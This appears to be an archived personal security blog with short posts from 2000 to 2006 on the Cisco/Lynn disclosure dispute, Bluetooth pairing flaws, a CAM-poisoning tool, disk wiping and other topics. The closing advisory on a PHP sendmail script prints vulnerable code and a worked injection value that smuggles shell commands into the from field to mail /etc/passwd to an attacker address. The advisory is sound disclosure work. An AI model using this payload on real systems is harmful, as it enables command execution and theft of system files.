| . |
|
Bitland.Net Security Notes
Comments? email jwilkins-at-bitland*net
More information on the author at Jonathan Wilkins's home page RSS feed available at http://www.bitland.net/index.rss 
|
| Archives: 2007, 2006, 2005, 2004, 2003, 2002, 2001, 2000 |
| |
| |
| Cybercrime nets more than illegal drugs in 2004 | (2006/12/08 15:15) |
I just read here that in 2004 computer crime exceeded the illegal drug trade in revenues. Apparently the take was around $105 billion. |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Comments on the Cisco Debacle | (2005/08/04 14:30) |
Update: I just read that Cisco had paid ISS to do the research, if this is true, the following doesn't apply. I've only heard it from one source though. Michael Lynn released some information on reliable exploitation of Cisco IOS vulnerabilities at this year's Blackhat. He did so over the objection of the company that paid him to do the research and also against Cisco's wishes. Firstly, some links, with full background: Boing Boing's coverage Schneier's comments Tom's comments My opinion is that Cisco has made some huge mistakes in handling this incident. Firstly, they sued a security researcher. That's definitely going to cause them a huge amount of pain over the next weeks and months as more and more researchers go after them. Outside of branding your products "Unbreakable", suing researchers is the fastest way to paint a giant bullseye on your back. Secondly, they tried to cover up the research. Everyone close to the industry knows that pretty much any type of vulnerability is exploitable given time. Most are aware that this isn't the first Cisco IOS overflow. FX of Phoenolit spoke a couple of years about exploiting them. The only difference is that Michael was able to prevent the box from rebooting by killing off the heap checker and spawn a shell. If Cisco had just kept their mouths shut, this would have gotten almost no press. I was planning on skipping the talk entirely (because I saw FX's talk) until I heard about Cisco's efforts to suppress it. Cisco has also managed to annoy various government agencies that are concerned with critical infrastructure protection. Cisco had an obligation to disclose information like that revealed in Lynn's talk and it's clear that they didn't notify a large number of interested agencies. ISS has also managed to severely damage themselves. They basically asked one of their researchers to do some outstanding work and then, at the last minute, caved to a vendor over a presentation that didn't actually release new vulnerability information. That's the truly insane part. All of this uproar is over someone saying that you can exploit Cisco hardware. Something anyone involved in security has had to assume since Cisco started shipping gear and that most people knew was confirmed 2 years ago. Despite this, ISS demonstrated that they were willing to kowtow to a vendor over a well known fact. ISS's credibility as a vulnerability research organization is pretty much gone. I predict that a large number of their employees will leave over the next year. Tom argues that ISS had no choice in the matter. I disagree. I don't see why Cisco has a case against them at all. Security companies do security research all the time and release the results. They didn't have to agree to be quiet in the first place. It was only after they agreed to quash the research that they ran into trouble. They also make it easier for future companies to pull the same trick. Next time ISS is about to release an advisory, the vendor just says that they'll sue and watch as ISS drops it.. As for Lynn, I'm pretty sure that he did the right thing. As he saw it, Cisco had this huge vulnerability that they were about to make much worse (by deploying a feature that would make worms trivial to write) and they were obviously willing to hide the research from thousands of security professionals and government agencies that had a need to know. He did violate his NDA with ISS, but I would have thought that ISS's stance on the issue would be much different. Caving in to vendor pressure like this damages them enormously. |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Bluetooth Crypto Broken | (2005/06/03 13:45) |
Slashdot reports on a new threat for Bluetooth devices. It's possible to eavesdrop on conversations and even initiate calls. It turns out it's embarrasingly easy. Bluetooth devices need to be be paired in order to talk to each other. In order for this to happen, the user enters a sequence into both devices and they then negotiate a key. Ollie Whitehouse demonstrated a weakness in this process last year wherein you could deduce the key if you could sniff the initial communication. The Bluetooth spec apparently includes a "I forgot my key" message that a device can send to redo this key negotiation. If you are within range, it's trivial to spoof this message. Way to go. Read about the Bluetooth crypto break here |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Aluminum Foil Defeats Common Shoplifting Defence | (2005/06/01 11:35) |
From Hack In The Box: Apparently those anti-shoplifting systems you find all over the place can be defeated by a few layers of aluminum foil. I'm not sure if this applies to all of the variants, but I don't see why it wouldn't. They all rely on being able to get a signal to a small reciever inside the device attached to any item of value. |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Corporate Espionage and Driver Vulnerabilities | (2005/05/30 09:00) |
Since I'm travelling and since these went across Slashdot, I'll be brief. It seems that a bunch of Israeli companies have been trojaning each other to gain competitive information. So far 18 arrests have been made and some large companies have been implicated including two cell phone providers and the Israel's main satellite tv company. Wired's coverage Slashdot's coverage Slashdot also points to this SecurityFocus.com article on vulnerabilities in driver software. It's a fairly high level article, but it's good to see kernel bugs getting greater attention. |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| XSS Cheat Sheet | (2005/05/25 14:15) |
RSnake has a really handy XSS Cheat Sheet. It won't help you if you don't understand XSS attacks to begin with, but it's a pretty complete list of variants and obfuscation techniques. |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| DNS Testing | (2005/05/11 15:50) |
If you came across this site because you were checking out IDS or firewall logs and have questions, feel free to email me (jwilkins at bitland dot net). I'm currently doing some research on some aspects of various DNS server implementations. I'm not doing anything intrusive, but I am doing a lot of queries against a wide variety of servers. |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Wiping disks | (2003/10/15 08:00) |
Destroying the data on a disk is a fairly complicated thing to do. Peter Guttman wrote a fairly comprehensive paper on this a few years ago in which he recommended 3 wipes with random data as being sufficient for modern IDE drives. If you agree with him, there's still the issue of how to go about this in a reasonable amount of time. Here's what I do: I use an OpenBSD boot floppy or boot CD and kick it into the shell when it prompts me. Then I use dd to write and /dev/arandom to overwrite the disk. dd if=/dev/arandom of=/dev/rwd0c bs=32768In my experiments, optimal speed was gained by specifying a block size of 32768. Other block sizes may work better with your drive. Do a couple of tests and figure out what's best for you. Hitting ctrl-T will give you status at any time Peter Guttman's paper on wiping disks |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Taranis Released (CAM Table Poisoning for Switched Ethernet Networks) | (2001/09/06 12:00) |
I wrote a paper and a tool to perform CAM table poisoning on ethernet switches. From the README: Taranis redirects traffic on switch hardware by sending spoofed ethernet traffic. This is not the same as an ARP poisoning attack as it affects only the switch, and doesn't rely on ARP packets. Plus, it is virtually invisible because the packets it sends aren't seen on any other port on the switch. Evading detection by an IDS that may be listening on a monitoring port is as simple as changing the type of packet that is sent by the packet spoofing thread. Full information Here |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Gnu Privacy Guard (GPG) Tutorial at Unix Review | (2001/01/28 12:00) |
Unix Review has an excellent article on getting started with Gnu's Privacy Guard Read it here |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| Achilles, tool to assist auditing of web sites | (2000/11/16 12:00) |
Auditing web code can be a time consuming endeavour. There are a lot of automated tools for testing C code, but few aimed specifically at the various web based scripting languages. Achillies serves as a proxy that will allow you to change input fields on the fly. No more saving web pages, editing them to adjust input lengths. Re-loading.. bleh.. Achilles is available at Digizen |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| IP Stack testing tools | (2000/11/16 12:00) |
Network stacks need to be tested with hostile input to determine if they're really up to the rigors of the big bad internet. In order to do this testing, you need automatic packet generation tools. These tools are also useful if you have any code that deals with raw ip packets, sniffers for example. ISIC (IP Stack Integrity Checker) is available Here IPTest is a part of Darren Reed's ipfilter package which is available Here |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| sequoiasoft's sendmail php script dangerous | (2000/11/09 12:00) |
Written by Sequioa Software, this script allows execution of arbitrary code by a malicious user. Essentially, popen() executes a shell which does the actual interpretation of the command. If an attacker crafts their return email address carefully, then they can cause the popen() call to execute chosen commands or reveal files.
//The workhorse method, does the actual sending of the mail.
//Doesn't check for errors so be careful!
function Send($sendmail = "/usr/sbin/sendmail") {
if($this->from == "") {
$fp = popen($sendmail . " -i " . $this->to, "w");
} else {
$fp = popen($sendmail . " -i -f"" . $this->from . "" " .
$this->to, "w");
}
Given the above code fragment, if I provide a from line such as:
foo@bat.com" evil@mailinator.com < /etc/passwd; touch /tmp/gotcha;I can have the contents of any file that the webserver account (usually nobody) has access to, and can execute commands as that user |
| +digg | +del.icio.us | [Security ] | Permanent link |
| |
| RSS feed available at http://www.bitland.net/index.rss |